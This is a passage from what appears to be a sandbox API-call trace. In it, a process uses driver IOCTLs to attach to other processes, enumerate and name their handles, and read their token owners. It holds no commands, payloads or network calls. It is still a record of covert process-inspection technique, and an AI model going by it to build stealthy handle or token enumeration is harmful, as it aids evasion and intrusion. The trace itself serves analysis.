lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0226.688] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.688] PsAcquireProcessExitSynchronization () returned 0x0 [0226.688] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880052b35d0) [0226.688] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0226.688] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.688] PsReleaseProcessExitSynchronization () returned 0x2 [0226.689] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0226.689] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.689] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xf [0226.689] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.689] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0xc8 [0226.689] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.689] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001e9eb30, HandleInformation=0x0) returned 0x0 [0226.689] ObOpenObjectByPointer (in: Object=0xfffffa8001e9eb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.689] ObfDereferenceObject (Object=0xfffffa8001e9eb30) returned 0x3d [0226.689] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.689] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.689] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.689] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.689] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.691] CloseHandle (hObject=0xc4) returned 1 [0226.691] CloseHandle (hObject=0xc8) returned 1 [0226.691] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.691] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.691] PsLookupProcessByProcessId (in: ProcessId=0x534, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.691] PsAcquireProcessExitSynchronization () returned 0x0 [0226.691] KeStackAttachProcess (in: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880052b35d0) [0226.691] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002167f20, HandleInformation=0x0) returned 0x0 [0226.691] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.691] PsReleaseProcessExitSynchronization () returned 0x2 [0226.691] ObfDereferenceObject (Object=0xfffffa8001e9eb30) returned 0x3b [0226.691] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.691] ObfDereferenceObject (Object=0xfffffa8002167f20) returned 0x1 [0226.691] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.691] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.692] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.692] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0226.692] PsLookupProcessByProcessId (in: ProcessId=0x534, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.692] PsAcquireProcessExitSynchronization () returned 0x0 [0226.692] KeStackAttachProcess (in: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880052b35d0) [0226.692] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80027e1f20, HandleInformation=0x0) returned 0x0 [0226.692] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.692] PsReleaseProcessExitSynchronization () returned 0x2 [0226.692] ObfDereferenceObject (Object=0xfffffa8001e9eb30) returned 0x3b [0226.692] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.692] ObfDereferenceObject (Object=0xfffffa80027e1f20) returned 0x1 [0226.692] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.692] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.692] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.692] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0226.692] PsLookupProcessByProcessId (in: ProcessId=0x534, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.692] PsAcquireProcessExitSynchronization () returned 0x0 [0226.692] KeStackAttachProcess (in: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880052b35d0) [0226.692] ObReferenceObjectByHandle (in: Handle=0x198, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e8d9e0, HandleInformation=0x0) returned 0x0 [0226.692] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.692] PsReleaseProcessExitSynchronization () returned 0x2 [0226.692] ObfDereferenceObject (Object=0xfffffa8001e9eb30) returned 0x3b [0226.692] ObQueryNameString (in: Object=0xfffffa8001e8d9e0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.692] ObfDereferenceObject (Object=0xfffffa8001e8d9e0) returned 0x1 [0226.692] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.692] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x730) returned 0xc8 [0226.692] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.692] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80021a89d0, HandleInformation=0x0) returned 0x0 [0226.692] ObOpenObjectByPointer (in: Object=0xfffffa80021a89d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.693] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x20 [0226.693] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.693] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.693] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.693] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.693] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.694] CloseHandle (hObject=0xc4) returned 1 [0226.694] CloseHandle (hObject=0xc8) returned 1 [0226.694] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.694] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0226.694] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.694] PsAcquireProcessExitSynchronization () returned 0x0 [0226.694] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0) [0226.694] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ee2c70, HandleInformation=0x0) returned 0x0 [0226.695] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.695] PsReleaseProcessExitSynchronization () returned 0x2 [0226.695] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0226.695] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b7c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315b7c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.695] ObfDereferenceObject (Object=0xfffffa8001ee2c70) returned 0x1 [0226.695] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.695] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.695] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.695] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0226.695] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.695] PsAcquireProcessExitSynchronization () returned 0x0 [0226.695] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0) [0226.695] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002160c00, HandleInformation=0x0) returned 0x0 [0226.695] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.695] PsReleaseProcessExitSynchronization () returned 0x2 [0226.695] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0226.695] ObQueryNameString (in: Object=0xfffffa8002160c00, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.695] ObfDereferenceObject (Object=0xfffffa8002160c00) returned 0x1 [0226.695] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.695] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.695] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.695] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.695] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.695] PsAcquireProcessExitSynchronization () returned 0x0 [0226.695] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0) [0226.695] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.695] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.695] PsReleaseProcessExitSynchronization () returned 0x2 [0226.696] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0226.696] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.696] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.696] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.696] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.696] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.696] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0226.696] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.696] PsAcquireProcessExitSynchronization () returned 0x0 [0226.696] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0) [0226.696] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80027ed140, HandleInformation=0x0) returned 0x0 [0226.696] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.696] PsReleaseProcessExitSynchronization () returned 0x2 [0226.696] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0226.696] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.696] ObfDereferenceObject (Object=0xfffffa80027ed140) returned 0x1 [0226.696] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.696] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.696] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.696] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.696] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.696] PsAcquireProcessExitSynchronization () returned 0x0 [0226.696] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0) [0226.696] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00191dd00, HandleInformation=0x0) returned 0x0 [0226.696] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.696] PsReleaseProcessExitSynchronization () returned 0x2 [0226.696] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0226.696] ObQueryNameString (in: Object=0xfffff8a00191dd00, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.696] ObfDereferenceObject (Object=0xfffff8a00191dd00) returned 0x1 [0226.696] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.697] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.697] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.697] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0226.697] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.697] PsAcquireProcessExitSynchronization () returned 0x0 [0226.697] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0) [0226.697] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800218c070, HandleInformation=0x0) returned 0x0 [0226.697] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.264] PsReleaseProcessExitSynchronization () returned 0x2 [0227.264] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0227.264] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.264] ObfDereferenceObject (Object=0xfffffa800218c070) returned 0x1 [0227.264] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.265] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.265] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.265] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0227.265] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.265] PsAcquireProcessExitSynchronization () returned 0x0 [0227.265] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0) [0227.265] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800218eba0, HandleInformation=0x0) returned 0x0 [0227.265] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.265] PsReleaseProcessExitSynchronization () returned 0x2 [0227.265] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0227.265] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.265] ObfDereferenceObject (Object=0xfffffa800218eba0) returned 0x1 [0227.265] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.265] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.265] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.265] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0227.265] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.265] PsAcquireProcessExitSynchronization () returned 0x0 [0227.265] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0) [0227.265] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0227.266] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.266] PsReleaseProcessExitSynchronization () returned 0x2 [0227.266] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0227.266] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.266] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0227.266] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.266] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.266] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.266] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0227.266] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.266] PsAcquireProcessExitSynchronization () returned 0x0 [0227.266] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880052b35d0) [0227.266] ObReferenceObjectByHandle (in: Handle=0xd8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020ab3a0, HandleInformation=0x0) returned 0x0 [0227.266] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.266] PsReleaseProcessExitSynchronization () returned 0x2 [0227.266] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0227.266] ObQueryNameString (in: Object=0xfffffa80020ab3a0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.266] ObfDereferenceObject (Object=0xfffffa80020ab3a0) returned 0x1 [0227.266] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.266] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: 